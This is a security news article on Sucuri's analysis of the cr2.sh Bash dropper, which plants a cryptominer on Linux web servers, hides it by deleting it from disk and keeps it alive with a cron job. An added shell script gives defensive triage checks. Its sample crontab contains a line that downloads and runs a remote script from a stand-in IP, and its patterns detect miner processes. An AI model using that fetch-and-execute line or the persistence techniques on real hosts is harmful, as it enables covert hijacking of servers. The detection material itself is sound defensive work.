Sucuri researchers have reported that a site owner contacted them about “a malicious process they had discovered running on their web server”. The process was consuming an unusual amount of CPU, which pointed to a cryptominer running in the background.
During their analysis, the researchers determined that the cryptominer was downloaded by a Bash script named cr2.sh; how that script is initially dropped on the server is not known.
What happens once the Bash script is executed? First it kills any processes whose names appear on a built-in list associated with cryptomining, such as xmrig and cryptonight, among others, which removes competing miners from the host.
It then checks whether its own malicious process is already running, and sends a request to a PHP file hosted on a separate server. That PHP file returns the IP address of the host from which the actual cryptominer payload is fetched.
More about the cr2.sh bash script
The cr2.sh script also needs to determine whether the host is 32- or 64-bit in order to download the matching cryptomining payload. It fetches the payload with curl or wget and saves it as /tmp/php, and the miner’s configuration file is downloaded from the same server, the researchers explained.
At this point everything needed to run the miner is on the web server, and the script spawns the process with nohup, so that the miner keeps running even if the user who launched it ends their shell session.
In the next phase, with the miner already loaded into the Linux host’s memory, the payload and its configuration file are deleted from disk. This is done to conceal the miner’s presence: the process keeps running from memory while a file-based scan of /tmp finds nothing. Note for responders that a running process whose binary has been unlinked is still visible on Linux, because /proc/<pid>/exe continues to point at the original path with a “(deleted)” suffix.
The malware also achieves persistence by creating a cron job that runs every minute. That job checks for the cr2.sh Bash script and, if the script is missing, re-downloads and executes it again:
Just in case someone detects the process and kills it along with the initial cr2.sh file, the file creates a cronjob (unless it exists already). This cron is scheduled to run every minute, re-download the cr2.sh file if it is missing, and execute the malicious bash script.
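The three behaviours described above (a deleted-but-running binary, an every-minute cron job that re-fetches and runs a remote script, and CPU-hungry processes with miner names or saved as /tmp/php) can each be checked from a shell. The following triage helper is an added example and is not Sucuri’s tooling or any code from the report; the crontab lines, ps output and the 198.51.100.7 address used in the demo are constructed, and the process-name list simply mirrors the names mentioned in the article.

```shell
#!/bin/sh
# Added example: three triage checks for the cr2.sh cryptominer behaviour.
# Hypothetical helper, not Sucuri's code. Sample inputs below are constructed.

# 1. Cron lines that run every minute AND fetch-and-execute something.
#    Reads crontab text on stdin (user crontab or /etc/crontab style).
suspicious_cron() {
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }      # skip comments and blanks
        ($1 == "*" || $1 == "*/1") && $2 == "*" && $3 == "*" && $4 == "*" && $5 == "*" {
            # every-minute schedule: flag if it downloads and runs a script
            if ($0 ~ /(curl|wget)/ && $0 ~ /([|] *(ba)?sh|[.]sh)/) print
        }
    '
}

# 2. Running processes whose executable has been unlinked from disk.
#    /proc/<pid>/exe keeps pointing at the old path with a "(deleted)" suffix.
#    Takes an optional proc root so it can be exercised on a fake tree.
deleted_exe_pids() {
    procroot="${1:-/proc}"
    for exe in "$procroot"/[0-9]*/exe; do
        [ -L "$exe" ] || continue                      # unmatched glob or not a link
        target=$(readlink "$exe" 2>/dev/null) || continue   # other users' pids: EACCES
        case "$target" in
            *" (deleted)") pid=${exe%/exe}; echo "${pid##*/} $target" ;;
        esac
    done
}

# 3. Miner-like processes. Reads `ps -eo pid,pcpu,comm` output on stdin.
#    Known miner names are flagged outright; a bare "php" is only flagged
#    above the CPU threshold (default 80%), since php CLI jobs can be legitimate.
miner_like_processes() {
    threshold="${1:-80}"
    awk -v thr="$threshold" '
        NR == 1 { next }                                # header line
        $3 ~ /(xmrig|cryptonight|minerd)/ || ($3 == "php" && $2 + 0 > thr) {
            print $1, $2, $3
        }
    '
}

# --- demo on constructed data -------------------------------------------
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/bin/backup --quiet
* * * * * [ -f /tmp/cr2.sh ] || curl -s http://198.51.100.7/cr2.sh -o /tmp/cr2.sh; sh /tmp/cr2.sh'

SAMPLE_PS='  PID %CPU COMMAND
  812  0.1 sshd
 4242 97.3 php
 4300 12.0 php
 5100  3.0 xmrig'

echo "[cron] every-minute fetch-and-execute entries:"
printf '%s\n' "$SAMPLE_CRONTAB" | suspicious_cron
echo "[proc] processes running from deleted binaries on this host:"
deleted_exe_pids /proc
echo "[ps] miner-like processes in sample output:"
printf '%s\n' "$SAMPLE_PS" | miner_like_processes 80
```

On a live host, feed the real data in: `crontab -l -u www-data | suspicious_cron`, `cat /etc/crontab /etc/cron.d/* | suspicious_cron`, and `ps -eo pid,pcpu,comm | miner_like_processes`. The deleted-binary check needs root to read every process’s exe link; a hit such as `4242 /tmp/php (deleted)` is exactly the footprint the cleanup step in cr2.sh leaves behind, and the binary can still be recovered from /proc/4242/exe before the process is killed.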
Note that this attack targets not only web servers but also desktop installations of 32- and 64-bit Linux, and other variants have been deployed to infect Windows installations.